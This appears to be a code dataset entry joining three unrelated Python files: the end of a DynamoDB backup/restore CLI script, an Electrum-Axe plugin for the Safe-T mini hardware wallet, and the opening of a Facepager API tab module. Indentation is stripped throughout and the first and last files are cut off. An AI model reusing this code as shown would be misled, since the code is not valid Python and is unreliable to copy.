logging.info("Processing " + data_file + " of " + destination_table)
items = []
item_data = json.load(
open(
dump_data_path
+ os.sep
+ source_table
+ os.sep
+ DATA_DIR
+ os.sep
+ data_file
)
)
items.extend(item_data["Items"])
# batch write data
put_requests = []
while len(items) > 0:
put_requests.append({"PutRequest": {"Item": items.pop(0)}})
# flush every MAX_BATCH_WRITE
if len(put_requests) == MAX_BATCH_WRITE:
logging.debug(
"Writing next "
+ str(MAX_BATCH_WRITE)
+ " items to "
+ destination_table
+ ".."
)
batch_write(
dynamo,
BATCH_WRITE_SLEEP_INTERVAL,
destination_table,
put_requests,
)
del put_requests[:]
# flush remainder
if len(put_requests) > 0:
batch_write(
dynamo, BATCH_WRITE_SLEEP_INTERVAL, destination_table, put_requests
)
if not args.skipThroughputUpdate:
# revert to original table write capacity if it has been modified
if (
int(write_capacity) != original_write_capacity
or int(read_capacity) != original_read_capacity
):
update_provisioned_throughput(
dynamo,
destination_table,
original_read_capacity,
original_write_capacity,
False,
)
# loop through each GSI to check if it has changed and update if necessary
if table_global_secondary_indexes is not None:
gsi_data = []
for gsi in table_global_secondary_indexes:
wcu = gsi["ProvisionedThroughput"]["WriteCapacityUnits"]
rcu = gsi["ProvisionedThroughput"]["ReadCapacityUnits"]
original_gsi_write_capacity = original_gsi_write_capacities.pop(0)
original_gsi_read_capacity = original_gsi_read_capacities.pop(0)
if (
original_gsi_write_capacity != wcu
or original_gsi_read_capacity != rcu
):
gsi_data.append(
{
"Update": {
"IndexName": gsi["IndexName"],
"ProvisionedThroughput": {
"ReadCapacityUnits": int(
original_gsi_read_capacity
),
"WriteCapacityUnits": int(
original_gsi_write_capacity
),
},
}
}
)
if gsi_data:
logging.info(
"Updating "
+ destination_table
+ " global secondary indexes write and read capacities as necessary.."
)
while True:
try:
dynamo.update_table(
TableName=destination_table,
GlobalSecondaryIndexUpdates=gsi_data,
)
break
except dynamo.exceptions.LimitExceededException:
logging.info(
"Limit exceeded, retrying updating throughput of"
"GlobalSecondaryIndexes in " + destination_table + ".."
)
time.sleep(sleep_interval)
except dynamo.exceptions.ProvisionedThroughputExceededException:
logging.info(
"Control plane limit exceeded, retrying updating throughput of"
"GlobalSecondaryIndexes in " + destination_table + ".."
)
time.sleep(sleep_interval)
# wait for table to become active
wait_for_active_table(dynamo, destination_table, "active")
logging.info(
"Restore for "
+ source_table
+ " to "
+ destination_table
+ " table completed. Time taken: "
+ str(datetime.datetime.now().replace(microsecond=0) - start_time)
)
else:
logging.info(
"Empty schema of "
+ source_table
+ " table created. Time taken: "
+ str(datetime.datetime.now().replace(microsecond=0) - start_time)
)
def main():
"""
Entrypoint to the script
"""
global args, sleep_interval, start_time
# parse args
parser = argparse.ArgumentParser(
description="Simple DynamoDB backup/restore/empty."
)
parser.add_argument(
"-a",
"--archive",
help="Type of compressed archive to create." "If unset, don't create archive",
choices=["zip", "tar"],
)
parser.add_argument(
"-b",
"--bucket",
help="S3 bucket in which to store or retrieve backups." "[must already exist]",
)
parser.add_argument(
"-m",
"--mode",
help="Operation to perform",
choices=["backup", "restore", "empty"],
)
parser.add_argument(
"-r",
"--region",
help="AWS region to use, e.g. 'us-west-1'. "
"Can use AWS_DEFAULT_REGION for local testing. Use '"
+ LOCAL_REGION
+ "' for local DynamoDB testing",
)
parser.add_argument(
"--host", help="Host of local DynamoDB [required only for local]"
)
parser.add_argument(
"--port", help="Port of local DynamoDB [required only for local]"
)
parser.add_argument(
"--accessKey", help="Access key of local DynamoDB " "[required only for local]"
)
parser.add_argument(
"--secretKey", help="Secret key of local DynamoDB " "[required only for local]"
)
parser.add_argument(
"-p",
"--profile",
help="AWS credentials file profile to use. Allows you to use a "
"profile instead accessKey, secretKey authentication",
)
parser.add_argument(
"-s",
"--srcTable",
help="Source DynamoDB table name to backup or restore from, "
"use 'tablename*' for wildcard prefix selection or '*' for "
"all tables. Mutually exclusive with --tag",
)
parser.add_argument(
"-d",
"--destTable",
help="Destination DynamoDB table name to backup or restore to, "
"use 'tablename*' for wildcard prefix selection "
"(defaults to use '-' separator) [optional, defaults to source]",
)
parser.add_argument(
"--prefixSeparator",
help="Specify a different prefix separator, " "e.g. '.' [optional]",
)
parser.add_argument(
"--noSeparator",
action="store_true",
help="Overrides the use of a prefix separator for backup wildcard "
"searches [optional]",
)
parser.add_argument(
"--readCapacity",
help="Change the temp read capacity of the DynamoDB table to backup "
"from [optional]",
)
parser.add_argument(
"-t",
"--tag",
help="Tag to use for identifying tables to back up. "
"Mutually exclusive with srcTable. Provided as KEY=VALUE",
)
parser.add_argument(
"--writeCapacity",
help="Change the temp write capacity of the DynamoDB table to restore "
"to [defaults to " + str(RESTORE_WRITE_CAPACITY) + ", optional]",
)
parser.add_argument(
"--schemaOnly",
action="store_true",
default=False,
help="Backup or restore the schema only. Do not backup/restore data. "
"Can be used with both backup and restore modes. Cannot be used with "
"the --dataOnly [optional]",
)
parser.add_argument(
"--dataOnly",
action="store_true",
default=False,
help="Restore data only. Do not delete/recreate schema [optional for "
"restore]",
)
parser.add_argument(
"--noConfirm",
action="store_true",
default=False,
help="Don't ask for confirmation before deleting existing schemas.",
)
parser.add_argument(
"--skipThroughputUpdate",
action="store_true",
default=False,
help="Skip updating throughput values across tables [optional]",
)
parser.add_argument(
"--dumpPath",
help="Directory to place and search for DynamoDB table "
"backups (defaults to use '" + str(DATA_DUMP) + "') [optional]",
default=str(DATA_DUMP),
)
parser.add_argument(
"--billingMode",
help="Set billing mode between "
+ str(PROVISIONED_BILLING_MODE)
+ "|"
+ str(PAY_PER_REQUEST_BILLING_MODE)
+ " (defaults to use '"
+ str(PROVISIONED_BILLING_MODE)
+ "') [optional]",
choices=[PROVISIONED_BILLING_MODE, PAY_PER_REQUEST_BILLING_MODE],
default=str(PROVISIONED_BILLING_MODE),
)
parser.add_argument(
"--log", help="Logging level - DEBUG|INFO|WARNING|ERROR|CRITICAL " "[optional]"
)
args = parser.parse_args()
# set log level
log_level = LOG_LEVEL
if args.log is not None:
log_level = args.log.upper()
logging.basicConfig(level=getattr(logging, log_level))
# Check to make sure that --dataOnly and --schemaOnly weren't simultaneously specified
if args.schemaOnly and args.dataOnly:
logging.info("Options --schemaOnly and --dataOnly are mutually exclusive.")
sys.exit(1)
# instantiate connection
if args.region == LOCAL_REGION:
conn = _get_aws_client(
service="dynamodb",
access_key=args.accessKey,
secret_key=args.secretKey,
region=args.region,
endpoint_url="http://" + args.host + ":" + args.port,
)
sleep_interval = LOCAL_SLEEP_INTERVAL
else:
if not args.profile:
conn = _get_aws_client(
service="dynamodb",
access_key=args.accessKey,
secret_key=args.secretKey,
region=args.region,
)
sleep_interval = AWS_SLEEP_INTERVAL
else:
conn = _get_aws_client(
service="dynamodb",
profile=args.profile,
region=args.region,
)
sleep_interval = AWS_SLEEP_INTERVAL
# don't proceed if connection is not established
if not conn:
logging.info("Unable to establish connection with dynamodb")
sys.exit(1)
# set prefix separator
prefix_separator = DEFAULT_PREFIX_SEPARATOR
if args.prefixSeparator is not None:
prefix_separator = args.prefixSeparator
if args.noSeparator is True:
prefix_separator = None
# do backup/restore
start_time = datetime.datetime.now().replace(microsecond=0)
if args.mode == "backup":
matching_backup_tables = []
if args.tag:
# Use Boto3 to find tags. Boto3 provides a paginator that makes searching tables by tag easier.
matching_backup_tables = get_table_name_by_tag(
args.profile, args.region, args.tag
)
elif args.srcTable.find("*") != -1:
matching_backup_tables = get_table_name_matches(
conn, args.srcTable, prefix_separator
)
elif args.srcTable:
matching_backup_tables.append(args.srcTable)
if len(matching_backup_tables) == 0:
logging.info("No matching tables found. Nothing to do.")
sys.exit(0)
else:
logging.info(
"Found "
+ str(len(matching_backup_tables))
+ " table(s) in DynamoDB host to backup: "
+ ", ".join(matching_backup_tables)
)
try:
if args.srcTable.find("*") == -1:
do_backup(conn, args.read_capacity, tableQueue=None)
else:
do_backup(conn, args.read_capacity, matching_backup_tables)
except AttributeError:
# Didn't specify srcTable if we get here
q = Queue()
threads = []
for i in range(MAX_NUMBER_BACKUP_WORKERS):
t = threading.Thread(
target=do_backup,
args=(conn, args.readCapacity),
kwargs={"tableQueue": q},
)
t.start()
threads.append(t)
time.sleep(THREAD_START_DELAY)
for table in matching_backup_tables:
q.put(table)
q.join()
for i in range(MAX_NUMBER_BACKUP_WORKERS):
q.put(None)
for t in threads:
t.join()
try:
logging.info("Backup of table(s) " + args.srcTable + " completed!")
except (NameError, TypeError):
logging.info(
"Backup of table(s) "
+ ", ".join(matching_backup_tables)
+ " completed!"
)
if args.archive:
if args.tag:
for table in matching_backup_tables:
dump_path = args.dumpPath + os.sep + table
did_archive, archive_file = do_archive(args.archive, dump_path)
if args.bucket and did_archive:
do_put_bucket_object(
args.profile, args.region, args.bucket, archive_file
)
else:
did_archive, archive_file = do_archive(args.archive, args.dumpPath)
if args.bucket and did_archive:
do_put_bucket_object(
args.profile, args.region, args.bucket, archive_file
)
elif args.mode == "restore":
if args.destTable is not None:
dest_table = args.destTable
else:
dest_table = args.srcTable
# If backups are in S3 download and extract the backup to use during restoration
if args.bucket:
do_get_s3_archive(
args.profile, args.region, args.bucket, args.srcTable, args.archive
)
if dest_table.find("*") != -1:
matching_destination_tables = get_table_name_matches(
conn, dest_table, prefix_separator
)
delete_str = ": " if args.dataOnly else " to be deleted: "
logging.info(
"Found "
+ str(len(matching_destination_tables))
+ " table(s) in DynamoDB host"
+ delete_str
+ ", ".join(matching_destination_tables)
)
threads = []
for table in matching_destination_tables:
t = threading.Thread(
target=delete_table, args=(conn, sleep_interval, table)
)
threads.append(t)
t.start()
time.sleep(THREAD_START_DELAY)
for thread in threads:
thread.join()
matching_restore_tables = get_restore_table_matches(
args.srcTable, prefix_separator
)
logging.info(
"Found "
+ str(len(matching_restore_tables))
+ " table(s) in "
+ args.dumpPath
+ " to restore: "
+ ", ".join(matching_restore_tables)
)
threads = []
for source_table in matching_restore_tables:
if args.srcTable == "*":
t = threading.Thread(
target=do_restore,
args=(
conn,
sleep_interval,
source_table,
source_table,
args.writeCapacity,
args.billingMode,
),
)
else:
t = threading.Thread(
target=do_restore,
args=(
conn,
sleep_interval,
source_table,
change_prefix(
source_table,
args.srcTable,
dest_table,
prefix_separator,
),
args.writeCapacity,
args.billingMode,
),
)
threads.append(t)
t.start()
time.sleep(THREAD_START_DELAY)
for thread in threads:
thread.join()
logging.info(
"Restore of table(s) "
+ args.srcTable
+ " to "
+ dest_table
+ " completed!"
)
else:
delete_table(
conn=conn, sleep_interval=sleep_interval, table_name=dest_table
)
do_restore(
dynamo=conn,
sleep_interval=sleep_interval,
source_table=args.srcTable,
destination_table=dest_table,
write_capacity=args.writeCapacity,
billing_mode=args.billingMode,
)
elif args.mode == "empty":
if args.srcTable.find("*") != -1:
matching_backup_tables = get_table_name_matches(
conn, args.srcTable, prefix_separator
)
logging.info(
"Found "
+ str(len(matching_backup_tables))
+ " table(s) in DynamoDB host to empty: "
+ ", ".join(matching_backup_tables)
)
threads = []
for table in matching_backup_tables:
t = threading.Thread(
target=do_empty, args=(conn, table, args.billingMode)
)
threads.append(t)
t.start()
time.sleep(THREAD_START_DELAY)
for thread in threads:
thread.join()
logging.info("Empty of table(s) " + args.srcTable + " completed!")
else:
do_empty(conn, args.srcTable, args.billingMode)
if __name__ == "__main__":
main()
|
safe_t.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from electrum_axe.util import bfh, bh2u, versiontuple, UserCancelled, UserFacingException
from electrum_axe.bitcoin import TYPE_ADDRESS, TYPE_SCRIPT
from electrum_axe.bip32 import BIP32Node
from electrum_axe import constants
from electrum_axe.i18n import _
from electrum_axe.plugin import Device
from electrum_axe.transaction import deserialize, Transaction
from electrum_axe.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum_axe.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data
# Safe-T mini initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class SafeTKeyStore(Hardware_KeyStore):
hw_type = 'safe_t'
device = 'Safe-T mini'
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None:
raise UserFacingException(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class SafeTPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, types
firmware_URL = 'https://safe-t.io'
libraries_URL = 'https://github.com/archos-safe-t/python-safet'
minimum_firmware = (1, 0, 5)
keystore_class = SafeTKeyStore
minimum_library = (0, 1, 0)
SUPPORTED_XTYPES = ('standard', )
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
from . import client
from . import transport
import safetlib.messages
self.client_class = client.SafeTClient
self.types = safetlib.messages
self.DEVICE_IDS = ('Safe-T mini',)
self.transport_handler = transport.SafeTTransport()
self.device_manager().register_enumerate_func(self.enumerate)
def get_library_version(self):
import safetlib
try:
return safetlib.__version__
except AttributeError:
return 'unknown'
def enumerate(self):
devices = self.transport_handler.enumerate_devices()
return [Device(path=d.get_path(),
interface_number=-1,
id_=d.get_path(),
product_key='Safe-T mini',
usage_page=0,
transport_ui_string=d.get_path())
for d in devices]
def create_client(self, device, handler):
try:
self.logger.info(f"connecting to device at {device.path}")
transport = self.transport_handler.get_transport(device.path)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
if not transport:
self.logger.info(f"cannot connect at {device.path}")
return
self.logger.info(f"connected to device at {device.path}")
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.logger.info(f"ping failed {e}")
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.logger.info(msg)
if handler:
handler.show_error(msg)
else:
raise UserFacingException(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Axe Testnet" if constants.net.TESTNET else "Axe"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_safe_t_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(str(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
if method == TIM_RECOVER:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
u2f_counter = 0
skip_backup = False
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language,
u2f_counter, skip_backup)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = self.types.HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise UserFacingException(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_safet_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2pkh', ):
return self.types.InputScriptType.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.InputScriptType.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_safet_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2pkh', ):
return self.types.OutputScriptType.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.OutputScriptType.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs,
lock_time=tx.locktime, version=tx.version)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 0):
keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
xpubs = wallet.get_master_public_keys()
if len(xpubs) == 1:
script_type = self.get_safet_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
else:
def f(xpub):
return self._make_node_path(xpub, [change, index])
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
pubkeys = list(map(f, sorted_xpubs))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * wallet.n,
m=wallet.m,
)
script_type = self.get_safet_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
txinputtype.script_type = self.get_safet_input_script_type(txin['type'])
else:
def f(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
return self._make_node_path(xpub, s)
pubkeys = list(map(f, x_pubkeys))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=list(map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures'))),
m=txin.get('num_sig'),
)
script_type = self.get_safet_input_script_type(txin['type'])
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx):
def create_output_by_derivation():
script_type = self.get_safet_output_script_type(info.script_type)
if len(xpubs) == 1:
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
address_n = self.client_class.expand_path("/%d/%d" % index)
pubkeys = [self._make_node_path(xpub, address_n) for xpub in xpubs]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(o)
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for o in tx.outputs():
_type, address, amount = o.type, o.address, o.value
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info.address_index, info.sorted_xpubs, info.num_sig
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t._extend_inputs(inputs)
for vout in d['outputs']:
o = t._add_bin_outputs()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
apimodules.py
|
import urllib.parse
import urllib.request, urllib.error
import secrets
import hashlib, hmac, base64
from mimetypes import guess_all_extensions
from datetime import datetime
from copy import deepcopy
import re
import os, sys, time
import io
from collections import OrderedDict
import threading
from PySide2.QtWebEngineWidgets import QWebEngineView
from PySide2.QtCore import Qt, QUrl
import requests
from requests.exceptions import *
from rauth import OAuth1Service
from requests_oauthlib import OAuth2Session
from requests_toolbelt import MultipartEncoder, MultipartEncoderMonitor
from urllib.parse import urlparse, parse_qs, unquote
import webbrowser
import cchardet
import json
if sys.version_info.major < 3:
from urllib import url2pathname
else:
from urllib.request import url2pathname
import dateutil.parser
from dialogs.folder import SelectFolderDialog
from dialogs.webdialog import PreLoginWebDialog, BrowserDialog, WebPageCustom
from server import LoginServer
from widgets.paramedit import *
from utilities import *
try:
from credentials import *
except ImportError:
credentials = {}
class ApiTab(QScrollArea):
"""
Generic API Tab Class
- parse placeholders
- saves and load current settings
- init basic inputs
- handle requests
"""
streamingData = Signal(list, list, list)
def __init__(self, mainWindow=None, name="NoName"):
QScrollArea.__init__(self, mainWindow)
self.timeout = None
self.maxsize = 5
self.mainWindow = mainWindow
self.loginWindow = None
self.name = name
self.connected = False
self.lastrequest = None
self.speed = None
self.lock_session = threading.Lock()
self.sessions = []
# Layout
self.mainLayout = QFormLayout()
self.mainLayout.setRowWrapPolicy(QFormLayout.DontWrapRows)
self.mainLayout.setFormAlignment(Qt.AlignLeft | Qt.AlignTop)
self.mainLayout.setLabelAlignment(Qt.AlignLeft)
self.mainLayout.setFieldGrowthPolicy(QFormLayout.AllNonFixedFieldsGrow)
self.mainLayout.setSizeConstraint(QLayout.SetMaximumSize) #QLayout.SetMinimumSize
# Extra layout
self.extraLayout = QFormLayout()
self.extraLayout.setRowWrapPolicy(QFormLayout.DontWrapRows)
self.extraLayout.setFormAlignment(Qt.AlignLeft | Qt.AlignTop)
self.extraLayout.setLabelAlignment(Qt.AlignLeft)
self.extraLayout.setFieldGrowthPolicy(QFormLayout.AllNonFixedFieldsGrow)
# Container
pagelayout = QVBoxLayout()
pagelayout.addLayout(self.mainLayout)
pagelayout.addStretch(0)
pagelayout.addLayout(self.extraLayout)
# For scrolling
page = QWidget(self)
page.setLayout(pagelayout)
self.setWidget(page)
self.setStyleSheet("QScrollArea {border:0px;background-color:transparent;}")
page.setAutoFillBackground(False) #important: place after setStyleSheet
self.setWidgetResizable(True)
# Popup window for auth settings
self.authWidget = QWidget()
# Default settings
try:
self.defaults = credentials.get(name.lower().replace(' ','_'),{})
except NameError:
self.defaults = {}
# Authorization / use preregistered app
self.auth_userauthorized = True
self.auth_preregistered = self.defaults.get('termsurl', '') != ''
# Called when Facepager stops
def cleanup(self):
pass
def idtostr(self, val):
"""
Return the Node-ID as a UTF-8 encoded string (bytes)
"""
return str(val).encode("utf-8")
def parseURL(self, url):
"""
Parse any URL and return the base path and query parameters
"""
url = url.split('?', 1)
path = url[0]
query = url[1] if len(url) > 1 else ''
query = urllib.parse.parse_qsl(query)
query = OrderedDict((k, v) for k, v in query)
return path, query
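# Illustrative sketch for parseURL() above (hypothetical URL, added for clarity):
# the URL is split into its base path and an ordered dict of query parameters.
#
#   path, query = self.parseURL("https://api.example.com/v1/items?limit=10&page=2")
#   # path  -> "https://api.example.com/v1/items"
#   # query -> OrderedDict([('limit', '10'), ('page', '2')])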
def parsePlaceholders(self,pattern,nodedata,paramdata={},options = {}):
if not pattern:
return pattern
elif isinstance(pattern,list):
return [self.parsePlaceholders(x, nodedata, paramdata, options) for x in pattern]
else:
pattern = str(pattern)
#matches = re.findall(ur"<([^>]*>", pattern)
#matches = re.findall(ur"(?<!\\)<([^>]*?)(?<!\\)>", pattern)
#Find placeholders in brackets, ignoring escaped brackets (escape character is backslash)
matches = re.findall(r"(?<!\\)(?:\\\\)*<([^>]*?(?<!\\)(?:\\\\)*)>", pattern)
for match in matches:
name, key, pipeline = parseKey(match)
if key in paramdata:
value = str(paramdata[key])
elif key == 'None':
value = ''
elif key == 'Object ID':
value = {'Object ID':str(nodedata['objectid'])}
name, value = extractValue(value, match, folder=options.get('folder', ''))
else:
name, value = extractValue(nodedata['response'], match, folder=options.get('folder',''))
if (pattern == '<' + match + '>'):
pattern = value
return pattern
else:
#Mask special characters
value = value.replace('\\','\\\\')
value = value.replace('<','\\<')
value = value.replace('>','\\>')
pattern = pattern.replace('<' + match + '>', value)
pattern = pattern.replace('\\<', '<')
pattern = pattern.replace('\\>', '>')
pattern = pattern.replace('\\\\', '\\')
return pattern
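# Illustrative sketch for parsePlaceholders() above (hypothetical node data):
# angle-bracket placeholders are replaced by values from paramdata, the Object ID
# or the node's response; escaped brackets (\< and \>) are left untouched.
#
#   nodedata = {'objectid': '12345', 'response': {'name': 'Alice'}}
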